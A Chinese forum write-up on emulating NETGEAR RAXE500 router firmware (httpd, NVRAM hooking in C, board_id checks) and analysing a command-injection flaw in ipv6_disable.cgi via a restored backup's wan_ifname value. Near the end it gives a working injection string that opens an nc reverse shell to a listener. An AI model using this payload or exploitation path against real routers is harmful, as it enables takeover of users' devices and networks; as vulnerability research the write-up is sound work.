-
-
[原创]NETGEAR 路由器环境模拟与漏洞分析
-
发表于: 2025-12-12 18:30 705
-
版本 : Nighthawk AX12 RAXE500 V1.2.14.114_2.0.67
首先 binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chk 解压固件。
进入 squashfs-root 目录,运行 sudo chroot . bin/sh 进入固件环境。
直接运行 usr/sbin/httpd 报错,需要根据 etc/init.d/mount-fs.sh 的脚本命令创建目录运行环境。
创建目录环境命令:
再次运行报错,需要将 /tmp/shm_id 的值修改为0:
之后再次运行报错:
GDB 调试发现 tmp_h_c 的值为空,代码如下:

分析代码,需要添加启动参数: /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem

再次运行提示生成证书失败:
查看 /dev/ 下的设备,因为没有 /dev/random 和 /dev/urandom 导致熵不足引起的,需要将主机的 dev 设备映射到固件目录:
再次运行就成功了
虽然 HTTPD 的服务运行成功了,但是网页无法访问,访问的提示如下:
对应的代码如下:

需要从 NVRAM 读取 ddns_hostname 的值,现在需要一个 nvram.ini 文件,和一个模拟 acosNvramConfig_* 的 SO。
在 GITHUB 上有一个 libnvram_faker/conf/netgear/nvram.ini 的配置文件,然后通过 HOOK 来模拟以下的函数:

HOOK acosNvramConfig 的 acosNvramConfig.c 代码如下:
/tmp/route.cfg 的配置文件如下:
编译为 acosNvramConfig.so 后放到 lib 目录:
需要更新 route.cfg,将 lan_ipaddr=192.168.1.1 修改为本机地址 127.0.0.1,然后运行以下命令:
访问 71eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8R3`.`. 提示以下错误:
报错代码如下:

dword_1439FA4 的值来自 is_authorizied() 函数:

is_authorizied 函数在 libacos_nvram.so 中,代码如下:

功能是取 NVRAM 的 board_id 来与 U12H449 等做比较,搜索 U12H449 选择 U12H449T00_NETGEAR 做为 board_id:

更新 route.cfg 增加 board_id=U12H449T00_NETGEAR 后,访问 e27K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4y4@1j5i4u0@1i4K6u0W2K9s2c8E0 成功,但是有时候出现不明原因的 (Segmentation fault) - core dumped:

在访问 ipv6_disable.cgi 时,有如下的代码:
从 NVRAM 中读取了 wan_ifname 的值做为 system 的参数:

而 wan_ifname 的值可以通过 2e2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3V1k6n7b7f1E0Q4y4h3k6T1j5h3y4C8N6i4m8Q4x3X3g2Z5N6r3@1`. 恢复备份文件的功能来设置:
上传文件代码如下:


libacos_nvram.so 的 shared_acos_nvram_restore_configuration 代码如下:

恢复配置代码只是一个简单的 CP。
修改 route.cfg 文件的 wan_ifname=eth0&rm /tmp/f 2>/dev/null; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.3.3 9999 > /tmp/f& 进行测试,
打开监听端口9999:
打开 c53K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1j5I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3V1k6u0f1q4j5$3i4K6g2X3k6r3W2K6j5h3u0D9k6g2)9J5k6h3S2@1L8b7`.`. 页面 , 点击 Apply 按钮 , 就获取到了反弹SHELL:


# binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chkDECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------58 0x3A Flattened device tree, size: 969 bytes, version: 171030 0x406 Flattened device tree, size: 9970 bytes, version: 1742870 0xA776 CRC32 polynomial table, little endian703534 0xABC2E CRC32 polynomial table, little endianWARNING: Extractor.execute failed to run external extractor 'lzop -f -d '%e'': [Errno 2] No such file or directory: 'lzop', 'lzop -f -d '%e'' might not be installed correctly761969 0xBA071 LZO compressed data836250 0xCC29A HTML document header836500 0xCC394 HTML document footer836532 0xCC3B4 HTML document header837187 0xCC643 HTML document footer837211 0xCC65B HTML document header838626 0xCCBE2 HTML document footer838650 0xCCBFA HTML document header839246 0xCCE4E HTML document footer957782 0xE9D56 Flattened device tree, size: 5913 bytes, version: 17963698 0xEB472 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: -1 bytes4587594 0x46004A Flattened device tree, size: 49513 bytes, version: 174637110 0x46C1B6 Flattened device tree, size: 49513 bytes, version: 174686626 0x478322 Flattened device tree, size: 47694 bytes, version: 174734322 0x483D72 Flattened device tree, size: 50144 bytes, version: 174784466 0x490152 Flattened device tree, size: 50144 bytes, version: 174834610 0x49C532 Flattened device tree, size: 49601 bytes, version: 174884214 0x4A86F6 Flattened device tree, size: 49633 bytes, version: 174933850 0x4B48DA Flattened device tree, size: 49557 bytes, version: 174983410 0x4C0A72 Flattened device tree, size: 49677 bytes, version: 175033090 0x4CCC82 Flattened device tree, size: 47733 bytes, version: 175080826 0x4D86FA Flattened device tree, size: 48647 bytes, version: 175129474 0x4E4502 Flattened device tree, size: 48802 bytes, version: 175178278 0x4F03A6 Flattened device tree, size: 48802 bytes, version: 175227082 0x4FC24A Flattened device tree, size: 48767 bytes, version: 175275850 0x5080CA Flattened device tree, size: 48767 bytes, version: 175324618 0x513F4A Flattened device tree, size: 48767 bytes, version: 175373386 0x51FDCA Flattened device tree, size: 50605 bytes, version: 175423994 0x52C37A Flattened device tree, size: 50605 bytes, version: 175474602 0x53892A Flattened device tree, size: 50412 bytes, version: 175525014 0x544E16 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 78884152 bytes, 3245 inodes, blocksize: 131072 bytes, created: 2025-05-16 08:07:54# binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chkDECIMAL HEXADECIMAL DESCRIPTION--------------------------------------------------------------------------------58 0x3A Flattened device tree, size: 969 bytes, version: 171030 0x406 Flattened device tree, size: 9970 bytes, version: 1742870 0xA776 CRC32 polynomial table, little endian703534 0xABC2E CRC32 polynomial table, little endianWARNING: Extractor.execute failed to run external extractor 'lzop -f -d '%e'': [Errno 2] No such file or directory: 'lzop', 'lzop -f -d '%e'' might not be installed correctly761969 0xBA071 LZO compressed data836250 0xCC29A HTML document header836500 0xCC394 HTML document footer836532 0xCC3B4 HTML document header837187 0xCC643 HTML document footer837211 0xCC65B HTML document header838626 0xCCBE2 HTML document footer838650 0xCCBFA HTML document header839246 0xCCE4E HTML document footer957782 0xE9D56 Flattened device tree, size: 5913 bytes, version: 17963698 0xEB472 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: -1 bytes4587594 0x46004A Flattened device tree, size: 49513 bytes, version: 174637110 0x46C1B6 Flattened device tree, size: 49513 bytes, version: 174686626 0x478322 Flattened device tree, size: 47694 bytes, version: 174734322 0x483D72 Flattened device tree, size: 50144 bytes, version: 174784466 0x490152 Flattened device tree, size: 50144 bytes, version: 174834610 0x49C532 Flattened device tree, size: 49601 bytes, version: 174884214 0x4A86F6 Flattened device tree, size: 49633 bytes, version: 174933850 0x4B48DA Flattened device tree, size: 49557 bytes, version: 174983410 0x4C0A72 Flattened device tree, size: 49677 bytes, version: 175033090 0x4CCC82 Flattened device tree, size: 47733 bytes, version: 175080826 0x4D86FA Flattened device tree, size: 48647 bytes, version: 175129474 0x4E4502 Flattened device tree, size: 48802 bytes, version: 175178278 0x4F03A6 Flattened device tree, size: 48802 bytes, version: 175227082 0x4FC24A Flattened device tree, size: 48767 bytes, version: 175275850 0x5080CA Flattened device tree, size: 48767 bytes, version: 175324618 0x513F4A Flattened device tree, size: 48767 bytes, version: 175373386 0x51FDCA Flattened device tree, size: 50605 bytes, version: 175423994 0x52C37A Flattened device tree, size: 50605 bytes, version: 175474602 0x53892A Flattened device tree, size: 50412 bytes, version: 175525014 0x544E16 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 78884152 bytes, 3245 inodes, blocksize: 131072 bytes, created: 2025-05-16 08:07:54# sudo chroot . bin/shBusyBox v1.31.1 (2025-05-16 15:16:50 CST) built-in shell (ash)Enter 'help' for a list of built-in commands.# ls -ladrwxrwxrwx 22 1000 1000 4096 May 16 2025 .drwxrwxrwx 22 1000 1000 4096 May 16 2025 ..-rw-r--r-- 1 1000 1000 0 May 16 2025 .init_enable_coredrwxr-xr-x 2 1000 1000 4096 May 16 2025 bindrwxrwxr-x 3 1000 1000 4096 May 16 2025 datalrwxrwxrwx 1 1000 1000 16 May 16 2025 debug -> sys/kernel/debugdrwxrwxr-x 3 1000 1000 4096 May 16 2025 devdrwxr-xr-x 20 1000 1000 4096 May 16 2025 etcdrwxrwxr-x 3 1000 1000 4096 May 16 2025 homedrwxrwxr-x 2 1000 1000 4096 May 16 2025 includedrwxrwxr-x 6 1000 1000 20480 May 16 2025 libdrwxrwxr-x 3 1000 1000 4096 May 16 2025 lib64drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc2drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc3drwxrwxr-x 2 1000 1000 4096 May 16 2025 mntdrwxrwxr-x 9 1000 1000 4096 May 16 2025 optdrwxrwxr-x 2 1000 1000 4096 May 16 2025 procdrwxr-xr-x 2 1000 1000 4096 May 16 2025 sbindrwxr-xr-x 6 1000 1000 4096 May 16 2025 sharedrwxrwxr-x 3 1000 1000 4096 May 16 2025 syslrwxrwxrwx 1 1000 1000 8 May 16 2025 tmp -> /var/tmpdrwxr-xr-x 10 1000 1000 4096 May 16 2025 usrdrwxrwxr-x 2 1000 1000 4096 May 16 2025 vardrwxrwxr-x 3 1000 1000 4096 May 16 2025 websdrwxr-xr-x 11 1000 1000 32768 May 16 2025 www## sudo chroot . bin/shBusyBox v1.31.1 (2025-05-16 15:16:50 CST) built-in shell (ash)Enter 'help' for a list of built-in commands.# ls -ladrwxrwxrwx 22 1000 1000 4096 May 16 2025 .drwxrwxrwx 22 1000 1000 4096 May 16 2025 ..-rw-r--r-- 1 1000 1000 0 May 16 2025 .init_enable_coredrwxr-xr-x 2 1000 1000 4096 May 16 2025 bindrwxrwxr-x 3 1000 1000 4096 May 16 2025 datalrwxrwxrwx 1 1000 1000 16 May 16 2025 debug -> sys/kernel/debugdrwxrwxr-x 3 1000 1000 4096 May 16 2025 devdrwxr-xr-x 20 1000 1000 4096 May 16 2025 etcdrwxrwxr-x 3 1000 1000 4096 May 16 2025 homedrwxrwxr-x 2 1000 1000 4096 May 16 2025 includedrwxrwxr-x 6 1000 1000 20480 May 16 2025 libdrwxrwxr-x 3 1000 1000 4096 May 16 2025 lib64drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc2drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc3drwxrwxr-x 2 1000 1000 4096 May 16 2025 mntdrwxrwxr-x 9 1000 1000 4096 May 16 2025 optdrwxrwxr-x 2 1000 1000 4096 May 16 2025 procdrwxr-xr-x 2 1000 1000 4096 May 16 2025 sbindrwxr-xr-x 6 1000 1000 4096 May 16 2025 sharedrwxrwxr-x 3 1000 1000 4096 May 16 2025 syslrwxrwxrwx 1 1000 1000 8 May 16 2025 tmp -> /var/tmpdrwxr-xr-x 10 1000 1000 4096 May 16 2025 usrdrwxrwxr-x 2 1000 1000 4096 May 16 2025 vardrwxrwxr-x 3 1000 1000 4096 May 16 2025 websdrwxr-xr-x 11 1000 1000 32768 May 16 2025 www## usr/sbin/httpdlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00/tmp/shm_id opened error!# usr/sbin/httpdlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00/tmp/shm_id opened error!# mkdir -p /var/log /var/run /var/state/dhcp /var/ppp /var/udhcpd /var/zebra /var/siproxd /var/cache /var/tmp /var/samba /var/samba/share /var/samba/homes /var/samba/private /var/samba/locks# mkdir -p /var/log /var/run /var/state/dhcp /var/ppp /var/udhcpd /var/zebra /var/siproxd /var/cache /var/tmp /var/samba /var/samba/share /var/samba/homes /var/samba/private /var/samba/locks# usr/sbin/httpdlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00segment_id: 5 , in /tmp/shm_id. Get a incorrect Segment_ID: 5 and semaphore ID:-1something wrong in getting shm_id.# usr/sbin/httpdlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00segment_id: 5 , in /tmp/shm_id. Get a incorrect Segment_ID: 5 and semaphore ID:-1something wrong in getting shm_id.# usr/sbin/httpdlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00segment_id: 0 , in /tmp/shm_id. Get a correct Segment_ID: 0 and semaphore ID:0Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);Can't find handler for ASP command: genie_cgi_need_to_load_basic();Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");Can't find handler for ASP command: eco_get_redirect_link();Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")Can't find handler for ASP command: attached_devices_cgi_edit_name("model")Can't find handler for ASP command: attached_devices_cgi_edit_name("name")Can't find handler for ASP command: attached_devices_cgi_edit_name("type")Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")Can't find handler for ASP command: wlg_cgi_get_isolation_status();Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");Can't find handler for ASP command: qos_cgi_get_bandwidth();Can't find handler for ASP command: qos_cgi_get_mac();Can't find handler for ASP command: qos_cgi_get_custom_table();Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();Can't find handler for ASP command: cdl_cgi_set_hijack(1);Can't find handler for ASP command: genie_cgi_get_client_type();Can't find handler for ASP command: 13Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();Can't find handler for ASP command: cdl_cgi_set_hijack(0);Can't find handler for ASP command: check_is_index()Can't find handler for ASP command: gui_get_opmode_param("pre_mode");Can't find handler for ASP command: isPortTrunking("is_ptk_start");Can't find handler for ASP command: isPortTrunking("is_ptk_end");# can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!dil init is_no_boarddata():can't open file /misc2/.bd_dataadd active user:, sessionId:0x0, cookie:0usr/sbin/httpd(pid=4777) is calling shared_acos_nvram_commit:httpd: socket bound in 255.255.255.255:9443.httpd: ipv6 socket bound in 80.Can't open device file: /dev/spiv6qemu: uncaught target signal 11 (Segmentation fault) - core dumped# usr/sbin/httpdlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00segment_id: 0 , in /tmp/shm_id. Get a correct Segment_ID: 0 and semaphore ID:0Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);Can't find handler for ASP command: genie_cgi_need_to_load_basic();Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");Can't find handler for ASP command: eco_get_redirect_link();Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")Can't find handler for ASP command: attached_devices_cgi_edit_name("model")Can't find handler for ASP command: attached_devices_cgi_edit_name("name")Can't find handler for ASP command: attached_devices_cgi_edit_name("type")Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")Can't find handler for ASP command: wlg_cgi_get_isolation_status();Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");Can't find handler for ASP command: qos_cgi_get_bandwidth();Can't find handler for ASP command: qos_cgi_get_mac();Can't find handler for ASP command: qos_cgi_get_custom_table();Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();Can't find handler for ASP command: cdl_cgi_set_hijack(1);Can't find handler for ASP command: genie_cgi_get_client_type();Can't find handler for ASP command: 13Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();Can't find handler for ASP command: cdl_cgi_set_hijack(0);Can't find handler for ASP command: check_is_index()Can't find handler for ASP command: gui_get_opmode_param("pre_mode");Can't find handler for ASP command: isPortTrunking("is_ptk_start");Can't find handler for ASP command: isPortTrunking("is_ptk_end");# can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!dil init is_no_boarddata():can't open file /misc2/.bd_dataadd active user:, sessionId:0x0, cookie:0usr/sbin/httpd(pid=4777) is calling shared_acos_nvram_commit:httpd: socket bound in 255.255.255.255:9443.httpd: ipv6 socket bound in 80.Can't open device file: /dev/spiv6qemu: uncaught target signal 11 (Segmentation fault) - core dumped# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pemlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00Generating a RSA private keyError Generating Key1082140528:error:0E06D06C:lib(14):func(109):reason(108):NA:0:group=req name=default_bits1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:1082140528:error:04081003:lib(4):func(129):reason(3):NA:0:# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pemlibacos_debug_log build time: Feb 17 2022 18:15:22****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.libhttpd build time: Jan 11 2024 09:55:00Generating a RSA private keyError Generating Key1082140528:error:0E06D06C:lib(14):func(109):reason(108):NA:0:group=req name=default_bits1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:1082140528:error:04081003:lib(4):func(129):reason(3):NA:0:# sudo mount -o bind /dev ./dev/# sudo mount -o bind /dev ./dev/# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pemlibacos_debug_log build time: Feb 17 2022 18:15:22libhttpd build time: Jan 11 2024 09:55:00Generating a RSA private key................................................+++++..............+++++writing new private key to '/tmp/h.k'----- read_board_data():can't open file /misc2/.bd_data read_board_data():can't open file /misc2/.bd_data read_board_data():can't open file /misc2/.bd_data/usr/sbin/httpd(pid=5128) is calling shared_acos_nvram_commit:segment_id: 0 , in /tmp/shm_id. Get a correct Segment_ID: 0 and semaphore ID:0Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);Can't find handler for ASP command: genie_cgi_need_to_load_basic();Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");Can't find handler for ASP command: eco_get_redirect_link();Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")Can't find handler for ASP command: attached_devices_cgi_edit_name("model")Can't find handler for ASP command: attached_devices_cgi_edit_name("name")Can't find handler for ASP command: attached_devices_cgi_edit_name("type")Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")Can't find handler for ASP command: wlg_cgi_get_isolation_status();Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");Can't find handler for ASP command: qos_cgi_get_bandwidth();Can't find handler for ASP command: qos_cgi_get_mac();Can't find handler for ASP command: qos_cgi_get_custom_table();Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();Can't find handler for ASP command: cdl_cgi_set_hijack(1);Can't find handler for ASP command: genie_cgi_get_client_type();Can't find handler for ASP command: 13Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();Can't find handler for ASP command: cdl_cgi_set_hijack(0);Can't find handler for ASP command: check_is_index()Can't find handler for ASP command: gui_get_opmode_param("pre_mode");Can't find handler for ASP command: isPortTrunking("is_ptk_start");Can't find handler for ASP command: isPortTrunking("is_ptk_end");# can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!dil init is_no_boarddata():can't open file /misc2/.bd_dataadd active user:, sessionId:0x0, cookie:0/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:httpd: socket bound in 255.255.255.255:9443.httpd: ipv6 socket bound in 80.Can't open device file: /dev/spiv6cert file /tmp/h.c, key file /tmp/h.k>>> start to launch lighttpdkillall: lighttpd: no process killed2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pemlibacos_debug_log build time: Feb 17 2022 18:15:22libhttpd build time: Jan 11 2024 09:55:00Generating a RSA private key................................................+++++..............+++++writing new private key to '/tmp/h.k'----- read_board_data():can't open file /misc2/.bd_data read_board_data():can't open file /misc2/.bd_data read_board_data():can't open file /misc2/.bd_data/usr/sbin/httpd(pid=5128) is calling shared_acos_nvram_commit:segment_id: 0 , in /tmp/shm_id. Get a correct Segment_ID: 0 and semaphore ID:0Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);Can't find handler for ASP command: genie_cgi_need_to_load_basic();Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");Can't find handler for ASP command: eco_get_redirect_link();Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")Can't find handler for ASP command: attached_devices_cgi_edit_name("model")Can't find handler for ASP command: attached_devices_cgi_edit_name("name")Can't find handler for ASP command: attached_devices_cgi_edit_name("type")Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")Can't find handler for ASP command: wlg_cgi_get_isolation_status();Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");Can't find handler for ASP command: qos_cgi_get_bandwidth();Can't find handler for ASP command: qos_cgi_get_mac();Can't find handler for ASP command: qos_cgi_get_custom_table();Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();Can't find handler for ASP command: cdl_cgi_set_hijack(1);Can't find handler for ASP command: genie_cgi_get_client_type();Can't find handler for ASP command: 13Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();Can't find handler for ASP command: cdl_cgi_set_hijack(0);Can't find handler for ASP command: check_is_index()Can't find handler for ASP command: gui_get_opmode_param("pre_mode");Can't find handler for ASP command: isPortTrunking("is_ptk_start");Can't find handler for ASP command: isPortTrunking("is_ptk_end");# can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!can't open mtd file!!dil init is_no_boarddata():can't open file /misc2/.bd_dataadd active user:, sessionId:0x0, cookie:0/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:httpd: socket bound in 255.255.255.255:9443.httpd: ipv6 socket bound in 80.Can't open device file: /dev/spiv6cert file /tmp/h.c, key file /tmp/h.k>>> start to launch lighttpdkillall: lighttpd: no process killed2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in useis_no_boarddata():can't open file /misc2/.bd_dataadd active user:, sessionId:0x0, cookie:0/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:httpd: socket bound in 255.255.255.255:9443.httpd: ipv6 socket bound in 80.Can't open device file: /dev/spiv6cert file /tmp/h.c, key file /tmp/h.k>>> start to launch lighttpdkillall: lighttpd: no process killed2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:returnis_no_boarddata():can't open file /misc2/.bd_dataadd active user:, sessionId:0x0, cookie:0/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:httpd: socket bound in 255.255.255.255:9443.httpd: ipv6 socket bound in 80.Can't open device file: /dev/spiv6cert file /tmp/h.c, key file /tmp/h.k>>> start to launch lighttpdkillall: lighttpd: no process killed2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return===> parse_http_request(3103) isToRouter = 0:return#include <stdio.h>#include <stdlib.h>#include <string.h>#include <ctype.h>#include <stdbool.h>#include <errno.h>// 假设配置文件路径#define ROUTE_CONFIG_PATH "/tmp/route.cfg"#define MAX_LINE_LENGTH 256#define MAX_KEY_LENGTH 64#define MAX_VALUE_LENGTH 128// 函数声明char *nvm_get_value(const char *key);char *nvm_get_value_no_alloc(const char *key, char *buffer, size_t buffer_size);/** * @brief 从配置文件中获取指定键的值(动态分配内存) * @param key 要查找的键名 * @return 成功返回动态分配的字符串(需要调用者释放),失败返回NULL */char *nvm_get_value(const char *key){ FILE *fp; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; char *result = NULL; int found = 0; // 参数检查 if (!key || strlen(key) == 0) { fprintf(stderr, "Error: Invalid key parameter\n"); return NULL; } // 打开配置文件 fp = fopen(ROUTE_CONFIG_PATH, "r"); if (fp == NULL) { fprintf(stderr, "Error: Cannot open config file %s: %s\n", ROUTE_CONFIG_PATH, strerror(errno)); return NULL; } // 逐行读取配置文件 while (fgets(line, sizeof(line), fp) != NULL) { // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释 if (line[0] == '\0' || line[0] == '#') { continue; } // 移除行首空白字符 char 